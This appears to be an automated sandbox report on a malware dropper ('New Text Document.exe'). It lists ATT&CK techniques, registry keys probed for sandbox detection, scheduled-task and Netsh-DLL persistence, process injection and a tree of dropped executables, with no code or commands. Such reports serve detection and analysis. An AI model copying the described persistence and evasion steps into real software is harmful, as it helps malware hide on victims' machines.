File created	C:\Windows\Tasks\UAC.job	schtasks.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\WindowsServices.exe	WindowsServices.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001a00000002b1f2-2588.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 7 IoCs

pid	pid_target	Process	procid_target
3580	2136	WerFault.exe	89
5488	4848	WerFault.exe	163
6940	7836	WerFault.exe	211
7236	7536	WerFault.exe	217
6264	7288	WerFault.exe	223
7608	2628	WerFault.exe	268
2540	436	WerFault.exe	299

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	silk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wermgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	silk.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	laser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fusca%20game.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	g.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	savedecrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cjrimgid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CPDB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lem.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bin2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bin2Srv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ServerX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tftp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenSync.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winX32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winX32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cHSzTDjVl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svc1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	temp_22207.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	code.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	g.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	StCl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cann.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6852	PING.EXE
5224	PING.EXE
5532	PING.EXE
2236	PING.EXE
6812	Process not Found
3432	Process not Found
1808	PING.EXE
5940	PING.EXE
7532	PING.EXE
6868	PING.EXE
7252	PING.EXE
7560	PING.EXE
6596	PING.EXE
1908	PING.EXE
2152	PING.EXE
1536	PING.EXE
7052	PING.EXE
8132	PING.EXE
2948	PING.EXE
1472	PING.EXE
1316	PING.EXE
6192	PING.EXE
2028	PING.EXE
8016	PING.EXE
3816	PING.EXE
5732	PING.EXE
7104	Process not Found
568	PING.EXE
6416	PING.EXE
6888	PING.EXE
7060	PING.EXE
6300	PING.EXE
8012	PING.EXE
8164	PING.EXE
7444	PING.EXE
3388	Process not Found
5392	Process not Found
1656	Process not Found
7584	PING.EXE
5268	PING.EXE
4492	PING.EXE
900	PING.EXE
5292	PING.EXE
856	Process not Found
1196	PING.EXE
1224	Process not Found
7420	Process not Found
5796	PING.EXE
3824	PING.EXE
7428	PING.EXE
5664	Process not Found
5084	PING.EXE
3916	PING.EXE
5736	PING.EXE
7552	PING.EXE
7876	PING.EXE
5088	PING.EXE
5656	PING.EXE
6772	PING.EXE
6508	PING.EXE
4792	Process not Found
4284	Process not Found
7084	Process not Found
3044	Process not Found

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x001900000002b198-2241.dat	nsis_installer_1
behavioral1/files/0x001900000002b198-2241.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client2.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	jrirkfiweid.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cjrimgid.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cjrimgid.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	jrirkfiweid.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Bjkm5hE.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
7680	timeout.exe
7112	timeout.exe
1956	timeout.exe
2852	timeout.exe

Discovers systems in the same network 1 TTPs 9 IoCs

discovery

Remote System Discovery

T1018

pid	Process
2152	net.exe
2816	net.exe
568	Process not Found
5084	net.exe
4492	net.exe
5168	net.exe
4868	net.exe
4932	net.exe
1448	net.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 7 IoCs

defense_evasion

pid	Process
4964	taskkill.exe
3816	taskkill.exe
5788	taskkill.exe
6112	taskkill.exe
5556	taskkill.exe
5776	taskkill.exe
348	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
1196	PING.EXE
7560	Process not Found
4124	PING.EXE
792	PING.EXE
5392	Process not Found
6440	Process not Found
8092	PING.EXE
6724	PING.EXE
3824	PING.EXE
2452	PING.EXE
1252	PING.EXE
5336	PING.EXE
3608	Process not Found
7004	Process not Found
436	PING.EXE
900	PING.EXE
7684	Process not Found
5504	PING.EXE
4924	PING.EXE
3432	Process not Found
8012	Process not Found
1808	PING.EXE
852	PING.EXE
5432	PING.EXE
336	PING.EXE
6252	PING.EXE
6444	Process not Found
7768	Process not Found
4492	PING.EXE
1908	PING.EXE
7896	PING.EXE
7948	PING.EXE
7060	PING.EXE
6800	Process not Found
7420	Process not Found
2868	Process not Found
2372	PING.EXE
5356	PING.EXE
1316	PING.EXE
5108	PING.EXE
3260	PING.EXE
5796	PING.EXE
2416	PING.EXE
5272	PING.EXE
6016	Process not Found
7520	Process not Found
6440	PING.EXE
5088	PING.EXE
5736	PING.EXE
2372	PING.EXE
3044	PING.EXE
3028	PING.EXE
4492	PING.EXE
5532	PING.EXE
6580	PING.EXE
8016	PING.EXE
7356	Process not Found
7224	Process not Found
6064	PING.EXE
1924	PING.EXE
7688	PING.EXE
3388	Process not Found
6888	PING.EXE
6736	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5708	schtasks.exe
5084	schtasks.exe
7312	schtasks.exe
5816	schtasks.exe
3032	schtasks.exe
4812	schtasks.exe
7788	schtasks.exe
7140	schtasks.exe
7452	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4340	g.exe
4340	g.exe
4340	g.exe
4340	g.exe
4340	g.exe
4340	g.exe
5668	untitled2.exe
5668	untitled2.exe
2800	StCl.exe
2800	StCl.exe
2800	StCl.exe
2800	StCl.exe
2132	g.exe
2132	g.exe
1960	random.exe
1960	random.exe
3964	Bjkm5hE.exe
3964	Bjkm5hE.exe
2132	g.exe
2132	g.exe
2132	g.exe
2132	g.exe
1960	random.exe
1960	random.exe
1960	random.exe
1960	random.exe
1960	random.exe
1960	random.exe
5236	silk.tmp
5236	silk.tmp
5208	z.exe
5208	z.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
5268	powershell.exe
5268	powershell.exe
5268	powershell.exe
5716	powershell.exe
5716	powershell.exe
5716	powershell.exe
3580	powershell.exe
3580	powershell.exe
3580	powershell.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
904	savedecrypter.exe
3964	Bjkm5hE.exe
3964	Bjkm5hE.exe
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
3964	Bjkm5hE.exe
3964	Bjkm5hE.exe
4872	chrome.exe
4872	chrome.exe
904	savedecrypter.exe
904	savedecrypter.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
904	savedecrypter.exe
5488	server.exe
6576	Server.exe
6972	discord.exe
3360	Explorer.EXE

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
6024	cann.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
8080	msedge.exe
8080	msedge.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3320	New Text Document.exe
Token: SeImpersonatePrivilege	4340	g.exe
Token: SeDebugPrivilege	2800	StCl.exe
Token: SeDebugPrivilege	5668	untitled2.exe
Token: SeDebugPrivilege	5788	taskkill.exe
Token: SeDebugPrivilege	6112	taskkill.exe
Token: SeImpersonatePrivilege	2132	g.exe
Token: SeDebugPrivilege	5556	taskkill.exe
Token: SeDebugPrivilege	5776	taskkill.exe
Token: SeImpersonatePrivilege	1960	random.exe
Token: SeDebugPrivilege	348	taskkill.exe
Token: SeDebugPrivilege	6008	Discord.exe
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeDebugPrivilege	904	savedecrypter.exe
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeDebugPrivilege	5268	powershell.exe
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeDebugPrivilege	5716	powershell.exe
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeShutdownPrivilege	3360	Explorer.EXE
Token: SeCreatePagefilePrivilege	3360	Explorer.EXE
Token: SeDebugPrivilege	6008	Discord.exe
Token: SeShutdownPrivilege	4872	chrome.exe
Token: SeCreatePagefilePrivilege	4872	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5236	silk.tmp
6024	cann.exe
6024	cann.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
4872	chrome.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
8080	msedge.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe
7520	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
6024	cann.exe
6024	cann.exe
6244	InstallSetup.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
6348	GRAW.exe
7856	CPDB.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3320 wrote to memory of 2136	3320	New Text Document.exe	89
PID 3320 wrote to memory of 2136	3320	New Text Document.exe	89
PID 3320 wrote to memory of 2136	3320	New Text Document.exe	89
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 4340	2136	g.exe	90
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 2136 wrote to memory of 2132	2136	g.exe	91
PID 3320 wrote to memory of 3000	3320	New Text Document.exe	97
PID 3320 wrote to memory of 3000	3320	New Text Document.exe	97
PID 3320 wrote to memory of 3000	3320	New Text Document.exe	97
PID 3320 wrote to memory of 2800	3320	New Text Document.exe	98
PID 3320 wrote to memory of 2800	3320	New Text Document.exe	98
PID 3320 wrote to memory of 2800	3320	New Text Document.exe	98
PID 3320 wrote to memory of 5668	3320	New Text Document.exe	99
PID 3320 wrote to memory of 5668	3320	New Text Document.exe	99
PID 5668 wrote to memory of 5788	5668	untitled2.exe	101
PID 5668 wrote to memory of 5788	5668	untitled2.exe	101
PID 5668 wrote to memory of 6112	5668	untitled2.exe	102
PID 5668 wrote to memory of 6112	5668	untitled2.exe	102
PID 5668 wrote to memory of 5556	5668	untitled2.exe	103
PID 5668 wrote to memory of 5556	5668	untitled2.exe	103
PID 5668 wrote to memory of 5776	5668	untitled2.exe	104
PID 5668 wrote to memory of 5776	5668	untitled2.exe	104
PID 3320 wrote to memory of 1960	3320	New Text Document.exe	105
PID 3320 wrote to memory of 1960	3320	New Text Document.exe	105
PID 3320 wrote to memory of 1960	3320	New Text Document.exe	105
PID 3320 wrote to memory of 3964	3320	New Text Document.exe	106
PID 3320 wrote to memory of 3964	3320	New Text Document.exe	106
PID 3320 wrote to memory of 3964	3320	New Text Document.exe	106
PID 3320 wrote to memory of 4516	3320	New Text Document.exe	107
PID 3320 wrote to memory of 4516	3320	New Text Document.exe	107
PID 3320 wrote to memory of 4516	3320	New Text Document.exe	107
PID 4516 wrote to memory of 5236	4516	silk.exe	108
PID 4516 wrote to memory of 5236	4516	silk.exe	108
PID 4516 wrote to memory of 5236	4516	silk.exe	108
PID 5236 wrote to memory of 6136	5236	silk.tmp	109
PID 5236 wrote to memory of 6136	5236	silk.tmp	109
PID 5236 wrote to memory of 6136	5236	silk.tmp	109
PID 3320 wrote to memory of 3144	3320	New Text Document.exe	110
PID 3320 wrote to memory of 3144	3320	New Text Document.exe	110
PID 3320 wrote to memory of 3144	3320	New Text Document.exe	110
PID 3144 wrote to memory of 5980	3144	IMG001.exe	113
PID 3144 wrote to memory of 5980	3144	IMG001.exe	113
PID 3144 wrote to memory of 5980	3144	IMG001.exe	113
PID 5980 wrote to memory of 348	5980	cmd.exe	115
PID 5980 wrote to memory of 348	5980	cmd.exe	115
PID 5980 wrote to memory of 348	5980	cmd.exe	115
PID 3320 wrote to memory of 5208	3320	New Text Document.exe	116
PID 3320 wrote to memory of 5208	3320	New Text Document.exe	116
PID 5208 wrote to memory of 3360	5208	z.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
7576	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3360
- C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
  2⤵
  - Downloads MZ/PE file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3320
- - C:\Users\Admin\AppData\Local\Temp\a\g.exe
    "C:\Users\Admin\AppData\Local\Temp\a\g.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Users\Admin\AppData\Local\Temp\a\g.exe
      "C:\Users\Admin\AppData\Local\Temp\a\g.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\a\g.exe
      "C:\Users\Admin\AppData\Local\Temp\a\g.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2132
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 828
      4⤵
      Program crash
      PID:3580
